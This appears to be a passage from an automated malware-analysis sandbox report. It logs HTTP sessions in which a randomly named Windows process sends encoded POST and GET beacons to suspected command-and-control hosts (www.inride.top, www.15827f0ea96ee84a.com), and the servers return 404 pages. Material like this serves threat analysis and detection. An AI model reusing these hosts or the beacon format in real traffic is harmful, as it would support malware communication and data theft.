64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div>... partial --> <script src="./script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49744	162.254.38.5	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:01.895291090 CEST	10872	OUT	POST /pobq/ HTTP/1.1 Host: www.inride.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.inride.top Referer: http://www.inride.top/pobq/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 35 6a 74 35 64 30 30 66 77 2f 73 62 75 62 6b 6a 6a 6a 44 43 6b 78 74 63 6d 4f 41 67 68 51 57 52 6d 58 52 63 72 33 6b 76 70 52 6f 67 63 66 66 35 6b 52 69 78 4f 46 6e 48 78 32 7a 57 64 6a 33 59 32 2f 37 6e 70 67 33 2b 4c 62 44 4c 35 54 53 4d 39 46 4d 7a 47 2f 42 77 4d 4d 4f 41 70 6a 6a 42 36 39 47 7a 41 64 54 44 6d 45 75 4d 61 7a 51 6f 2f 62 32 65 78 66 51 4c 43 6c 49 65 47 39 56 68 65 4a 36 75 79 34 4f 71 42 47 74 56 46 57 51 74 36 4b 65 55 37 6e 75 70 5a 77 6d 6d 7a 38 77 43 30 67 45 79 62 42 6f 70 64 6b 77 66 77 6a 70 55 72 70 6a 6e 66 44 66 6d 6d 6b 62 6e 33 68 6d 5a 50 4a 6c 77 65 58 42 4c 54 43 57 78 59 72 62 66 76 50 38 56 6c 66 47 78 34 69 39 39 79 6a 36 6b 45 59 49 6c 42 4d 44 54 54 57 6b 72 33 4f 54 37 4d 75 6b 7a 79 30 6b 79 4a 38 52 2b 4f 44 79 77 6f 55 74 34 32 2b 56 57 76 7a 49 38 46 4a 2b 61 31 62 41 59 76 6d 4b 7a 70 6f 73 38 75 32 45 79 47 4e 55 59 73 79 59 32 68 63 77 6a 49 33 33 78 59 54 44 42 49 31 69 33 69 4d 6e 32 69 62 69 32 6b 4e 53 6f 51 63 65 4c 57 71 [TRUNCATED] Data Ascii: SXqH06e=5jt5d00fw/sbubkjjjDCkxtcmOAghQWRmXRcr3kvpRogcff5kRixOFnHx2zWdj3Y2/7npg3+LbDL5TSM9FMzG/BwMMOApjjB69GzAdTDmEuMazQo/b2exfQLClIeG9VheJ6uy4OqBGtVFWQt6KeU7nupZwmmz8wC0gEybBopdkwfwjpUrpjnfDfmmkbn3hmZPJlweXBLTCWxYrbfvP8VlfGx4i99yj6kEYIlBMDTTWkr3OT7Mukzy0kyJ8R+ODywoUt42+VWvzI8FJ+a1bAYvmKzpos8u2EyGNUYsyY2hcwjI33xYTDBI1i3iMn2ibi2kNSoQceLWqbLNTFweJha86iusy5/4SIu5gGZPLE+NUFVODKopezWlx0xo8rxo6T8jKrhHcGfBQWH1HRR/JySe7d9SqhqlBrt8rgf7J5JWO3UA/Cps0bQ041cfOSBJwiCOZGT3mHHzHJYakZJ1oUDkYXLPBbrAQ8Fj5tJTVv3ui1rDkacakNUEwjcpm0FystRZ9XYLrbPa+3+J228msw+R8tqWBbK4S8HKlcsmG/F3xBU52xHxEikrfllD7ZAg0QI1VinLiQ4t72B5tCWbhLrtQPyKmP5uH2aFFbmpT4a15oYoQioJuUXjOelXfclhz+r6D3xFPYVJc5GC0Dh/QQ1kbWVBW68zcdN2vC0qTknm/b4RXvU+7SRQ+Vb9IMeyfQbLhMYRkC9gwlR1j+dqvKuviRiVpzOvsEWRc7NRfTluIDb0zRSgSe3iLbzyUFngRTuv7ArKnOmKW9FsUDQvRGVNY987aW9mEZtbkRe/eFNW8DhhhoO8ITkGlu81M+Xr0nr913a+zPiy7vnQlynVkfnVmoyTwmdXFpKOj6VcnKrPXzzeDdY3tnsXZOuBGA3YiMeE1CLCMeY2QvxLVamttzFYqGjhdpy0MDOxzvCLWu98mxxW3BefRfISyNakCstDseJKQ4C8KXL/Rc8k29/frJNpGb2tLqbBmSCd7a2azr+C6XZ [TRUNCATED]
Aug 2, 2024 13:42:02.640551090 CEST	695	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:02 GMT Server: Apache Content-Length: 551 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div>... partial --> <script src="./script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	162.254.38.5	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:04.473936081 CEST	507	OUT	GET /pobq/?SXqH06e=0hFZeB1J5YMps7YD9EXKzRFoue9yrlGg73wLiWYmmwVdUbyA0yCYARPd/TCJVzbB+Mjph3HYSufKySLgqUImG9FEAb3pqAbgiqKGJfzggFu5TBR26YX/ycI=&AV=_ng4uzR8Zz HTTP/1.1 Host: www.inride.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:42:05.078047037 CEST	710	IN	HTTP/1.1 404 Not Found Date: Fri, 02 Aug 2024 11:42:04 GMT Server: Apache Content-Length: 551 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div>... partial --> <script src="./script.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	103.71.177.176	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:18.812238932 CEST	800	OUT	POST /9uf2/ HTTP/1.1 Host: www.15827f0ea96ee84a.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.15827f0ea96ee84a.com Referer: http://www.15827f0ea96ee84a.com/9uf2/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 204 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 65 68 7a 57 33 37 52 78 6d 5a 64 4f 54 2b 58 57 68 56 6f 43 58 62 4c 4f 4c 44 64 69 66 4b 6b 68 72 43 4c 43 6d 76 37 75 57 64 41 30 31 36 4b 64 4f 74 45 44 6c 63 6d 35 2f 61 47 4c 39 59 4a 47 64 42 58 4b 68 59 4d 41 4d 41 64 45 6c 56 57 4d 2f 36 58 4c 6f 69 31 59 37 42 6a 65 36 34 62 6d 30 38 79 43 69 2f 31 56 2f 55 62 75 70 5a 75 42 73 72 6f 42 57 41 57 30 75 7a 36 4e 78 76 42 32 74 67 75 72 57 67 30 47 32 4f 4e 6d 38 6e 65 44 37 61 59 73 58 7a 61 6e 49 6c 50 72 6a 37 69 65 67 68 66 7a 55 38 7a 33 7a 70 7a 73 35 49 4e 66 6c 63 56 41 51 65 49 6c 39 44 51 4e 57 6c 38 44 4f 67 3d 3d Data Ascii: SXqH06e=ehzW37RxmZdOT+XWhVoCXbLOLDdifKkhrCLCmv7uWdA016KdOtEDlcm5/aGL9YJGdBXKhYMAMAdElVWM/6XLoi1Y7Bje64bm08yCi/1V/UbupZuBsroBWAW0uz6NxvB2tgurWg0G2ONm8neD7aYsXzanIlPrj7ieghfzU8z3zpzs5INflcVAQeIl9DQNWl8DOg==
Aug 2, 2024 13:42:19.718827963 CEST	570	IN	HTTP/1.1 404 Not Found Content-Length: 427 Content-Type: text/html; charset=utf-8 Date: Fri, 02 Aug 2024 11:42:19 GMT Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49747	103.71.177.176	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:21.390559912 CEST	820	OUT	POST /9uf2/ HTTP/1.1 Host: www.15827f0ea96ee84a.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.15827f0ea96ee84a.com Referer: http://www.15827f0ea96ee84a.com/9uf2/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 224 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 65 68 7a 57 33 37 52 78 6d 5a 64 4f 53 65 6e 57 78 46 55 43 52 37 4c 4a 58 54 64 69 57 71 6b 6c 72 43 48 43 6d 75 75 78 57 75 30 30 31 66 75 64 50 6f 34 44 6d 63 6d 35 30 36 47 4f 35 59 4a 33 64 42 62 6b 68 5a 41 41 4d 41 5a 45 6c 56 47 4d 2b 4d 66 45 71 79 31 61 77 68 6a 63 6b 49 62 6d 30 38 79 43 69 2f 77 77 2f 55 44 75 71 71 6d 42 2b 4b 6f 43 63 67 57 33 6d 54 36 4e 6e 66 41 39 74 67 76 38 57 68 70 72 32 4d 6c 6d 38 6a 61 44 2f 62 59 72 43 44 61 6c 46 46 50 36 31 35 76 6d 6d 42 53 43 63 61 2f 32 2b 70 37 4c 38 4f 63 46 30 74 30 58 43 65 73 57 67 45 5a 35 62 6d 42 4b 56 75 52 75 33 71 7a 38 61 78 36 46 2f 32 66 36 67 4d 64 30 61 6b 4d 3d Data Ascii: SXqH06e=ehzW37RxmZdOSenWxFUCR7LJXTdiWqklrCHCmuuxWu001fudPo4Dmcm506GO5YJ3dBbkhZAAMAZElVGM+MfEqy1awhjckIbm08yCi/ww/UDuqqmB+KoCcgW3mT6NnfA9tgv8Whpr2Mlm8jaD/bYrCDalFFP615vmmBSCca/2+p7L8OcF0t0XCesWgEZ5bmBKVuRu3qz8ax6F/2f6gMd0akM=
Aug 2, 2024 13:42:22.289268970 CEST	570	IN	HTTP/1.1 404 Not Found Content-Length: 427 Content-Type: text/html; charset=utf-8 Date: Fri, 02 Aug 2024 11:42:22 GMT Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49748	103.71.177.176	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:23.980734110 CEST	10902	OUT	POST /9uf2/ HTTP/1.1 Host: www.15827f0ea96ee84a.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.15827f0ea96ee84a.com Referer: http://www.15827f0ea96ee84a.com/9uf2/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 10304 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2 Data Raw: 53 58 71 48 30 36 65 3d 65 68 7a 57 33 37 52 78 6d 5a 64 4f 53 65 6e 57 78 46 55 43 52 37 4c 4a 58 54 64 69 57 71 6b 6c 72 43 48 43 6d 75 75 78 57 76 4d 30 31 4e 6d 64 4f 4c 51 44 6e 63 6d 35 33 36 47 50 35 59 4a 51 64 43 72 67 68 5a 38 51 4d 43 52 45 6a 32 2b 4d 76 4f 33 45 67 79 31 61 2f 42 6a 5a 36 34 61 79 30 38 69 38 69 2f 41 77 2f 55 44 75 71 72 57 42 37 72 6f 43 61 67 57 30 75 7a 37 66 78 76 41 56 74 67 58 73 57 68 73 57 32 39 46 6d 35 33 2b 44 35 35 77 72 65 54 61 64 43 46 4f 6e 31 35 6a 35 6d 42 66 39 63 61 69 54 2b 72 6e 4c 78 34 68 75 77 39 4a 4c 57 2f 38 37 7a 57 39 43 44 6b 6c 55 65 73 74 33 33 76 6d 6f 61 77 32 50 39 45 43 43 39 64 31 43 5a 77 51 4e 70 75 68 7a 66 4b 37 64 31 2f 51 71 68 66 6b 31 42 31 55 4f 37 57 53 31 50 6a 2b 53 42 5a 34 39 6e 66 37 4d 43 6a 4e 43 77 57 50 42 30 33 33 6f 38 35 2f 49 45 69 49 52 5a 70 2f 57 38 34 42 5a 7a 36 48 42 59 4e 49 37 32 6c 71 57 63 78 61 59 45 46 57 48 43 6a 30 30 34 36 33 5a 43 77 6f 76 51 58 43 49 62 46 36 39 41 43 56 67 67 2f 6d 79 56 32 [TRUNCATED] Data Ascii: SXqH06e=ehzW37RxmZdOSenWxFUCR7LJXTdiWqklrCHCmuuxWvM01NmdOLQDncm536GP5YJQdCrghZ8QMCREj2+MvO3Egy1a/BjZ64ay08i8i/Aw/UDuqrWB7roCagW0uz7fxvAVtgXsWhsW29Fm53+D55wreTadCFOn15j5mBf9caiT+rnLx4huw9JLW/87zW9CDklUest33vmoaw2P9ECC9d1CZwQNpuhzfK7d1/Qqhfk1B1UO7WS1Pj+SBZ49nf7MCjNCwWPB033o85/IEiIRZp/W84BZz6HBYNI72lqWcxaYEFWHCj00463ZCwovQXCIbF69ACVgg/myV2yAq29cpGRKJbtzLTfIO/ry41cC6mzo3OJiJJrBriW5FtqbQTCWcBn575SnSDlG+P8licuSKrFaSnwo4ZFDF27Vv7O0D5JR3KO/kHYzR3kNj3+8DWPd6qboutEsSJxV0W2gD1jgaP3hTkfOMTYJezDV44e7v0dmvab1a9fypAABgF3O/7ebciiRg6J/FMxlz5uZZSkNj3AFbXC1H2ioh2Rmbny7frmswcdEcMXW1jd40DLj4lI2vNv27zPix0v8O5ldx9zRZGInUsgmQYMozS1aFVsm1EUycz1IXTstrd16yCBVCNhEujnaABt0aDhrkRl3coN8qmwRXDEu2JHgp1QOdpG7pEN5Bo+U9QrYu816qdxJL7f9ds++Y+Tm9YNo+lZtPirjwCqj4/NHb5WMLiQS0/R98FtjRqI6z5dM6GYBz2O6yDFkCu7W4BBpRdTiQBvs2pjK1AkgZ1nrWG5d50n0GYkbnaKNsHWS0svNuv+hPtba8CId2SmGwzgrauYo8CuzW3qk+yd+qLl3sA4GX5IjBI2w4gFXXrmWoQQbOwv2TMJvGd2392VM3HShrnunuwcKKpuzTfC5jhcnAXVisr+5S1Yg+3nf+ApYZZ9Z8lIXajdoXlIXvz3ty/WgkWfcaHQBaxOc5SdZthWJIgULstoSy8oxeBfFFvSN [TRUNCATED]
Aug 2, 2024 13:42:24.891772032 CEST	570	IN	HTTP/1.1 404 Not Found Content-Length: 427 Content-Type: text/html; charset=utf-8 Date: Fri, 02 Aug 2024 11:42:24 GMT Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49749	103.71.177.176	80	5772	C:\Program Files (x86)\DpqmwVdXaJHvnbAwBGUnMowaNTznLLhKbsEmyiPPSdUzRqwv\wEnggOkwNlJAef.exe

Timestamp	Bytes transferred	Direction	Data
Aug 2, 2024 13:42:26.559092999 CEST	517	OUT	GET /9uf2/?SXqH06e=Tjb20Msl4sgbUMPAv0cgLdvoJjlvR840pSXAvJDGRu8+pqajaKEFoYauxtPF4KhiJSnYn4AUVVoWqG6D5/7kjylfywLE97TnvLa2s9Ew2nrTmaz066FYaB4=&AV=_ng4uzR8Zz HTTP/1.1 Host: www.15827f0ea96ee84a.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
Aug 2, 2024 13:42:27.430605888 CEST	570	IN	HTTP/1.1 404 Not Found Content-Length: 427 Content-Type: text/html; charset=utf-8 Date: Fri, 02 Aug 2024 11:42:27 GMT Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 2a 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 7d 0d 0a 68 33 2c 20 70 20 7b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 70 20 7b 20 63 6f 6c 6f 72 3a 20 67 72 65 79 3b 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 3a 20 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 0d 0a 3c 68 33 3e e6 89 be e4 b8 8d e5 88 b0 e6 82 a8 e8 a6 81 e8 ae bf e9 97 ae e7 9a 84 e9 a1 b5 e9 9d a2 e3 80 82 3c 2f 68 33 3e 0d 0a 0d 0a 3c 70 3e e5 8e 9f e5 9b a0 ef bc 9a e6 89 be e4 b8 8d e5 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><title>404 not found</title><style>* { font-family: Roboto, system-ui, sans-serif; }h3, p { text-align: center; }p { color: grey; }</style></head><body><h3>Error: 404 Page Not Found</h3><h3></h3><p></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
